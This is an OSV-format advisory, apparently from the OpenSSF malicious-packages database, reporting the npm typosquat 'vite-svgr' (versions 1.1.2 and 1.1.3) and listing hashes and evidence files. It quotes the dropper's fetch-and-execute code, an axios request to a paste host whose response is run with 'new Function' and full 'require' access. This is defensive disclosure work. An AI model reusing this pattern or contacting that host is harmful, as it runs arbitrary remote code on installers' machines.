{
  "id": "MAL-2026-5708",
  "summary": "Malicious code in vite-svgr (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5)\nPackage name `vite-svgr` impersonates the popular `vite-plugin-svgr`, but the shipped code is a fork of `tsconfig-paths` (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs `axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } })` and then runs the response body's `Cookie` field via `new Function('require', s)(require)` — arbitrary JavaScript with full Node `require` access executed under the installer's user. The code is reachable from the package's `main` via the exported `configJson(...)`, which spawns `node lib/mapProps.js` detached, so any consumer that imports this package and calls `configJson` triggers fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, fork of an unrelated library, and remote-payload-execution is the canonical supply-chain attack shape.\n",
  "modified": "2026-06-12T20:01:57.882374057Z",
  "published": "2026-06-12T19:27:21Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "versions": ["1.1.3"],
        "modified_time": "2026-06-12T19:27:28Z",
        "id": "IN-MAL-2026-006215",
        "sha256": "a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5",
        "source": "amazon-inspector",
        "import_time": "2026-06-12T19:44:20.792697857Z"
      },
      {
        "versions": ["1.1.2"],
        "modified_time": "2026-06-12T19:27:21Z",
        "id": "IN-MAL-2026-006214",
        "sha256": "d238c0e37d7a415f10030826af53fbff9c537bfd527553c8005fd51f6499f0c4",
        "source": "amazon-inspector",
        "import_time": "2026-06-12T19:44:20.686148115Z"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/vite-svgr/v/1.1.3"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/vite-svgr/v/1.1.2"}
  ],
  "affected": [
    {
      "package": {"name": "vite-svgr", "ecosystem": "npm", "purl": "pkg:npm/vite-svgr"},
      "versions": ["1.1.3", "1.1.2"],
      "database_specific": {
        "indicators": {
          "package_integrity": [
            {
              "hashes": {
                "sha1": "c11089a280629728d200c5267bb619eb6d0ead2f",
                "sha512_sri": "sha512-sHDAZ7u5LzJv7qMMawgKsqLRRh3xlnE5ryc/1M0p6kqjSVCpEGjLvcF/xwt+9zUsoeD8fGa57Z0CgaH8jgxtCg=="
              },
              "filename": "vite-svgr-1.1.3.tgz"
            }
          ],
          "evidence_files": [
            {
              "tlsh": "8c21124f757ca0a8017013f5672be426f965643f300290d5739c87a21f3655d6142fde",
              "path": "lib/mapProps.js",
              "sha256": "cbb95b591c97bbdc1a2f6aa41c118be14ed1e53eee6d05740317ce58942da860"
            },
            {
              "tlsh": "e041b924c928cdb365c0526a787d5681e238444b4d99fc08b3e5536e4f4c2bf62b57ae",
              "path": "package.json",
              "sha256": "4d4f104d657b848c012ccc74af88f8769891687cf6dee211688403cfe6313929"
            }
          ]
        },
        "cwes": [
          {"cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code"},
          {"cweId": "CWE-506", "name": "Embedded Malicious Code", "description": "The product contains code that appears to be malicious in nature."}
        ],
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-svgr/MAL-2026-5708.json"
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {"name": "Amazon Inspector", "contact": ["inspector-research@amazon.com"], "type": "FINDER"}
  ]
}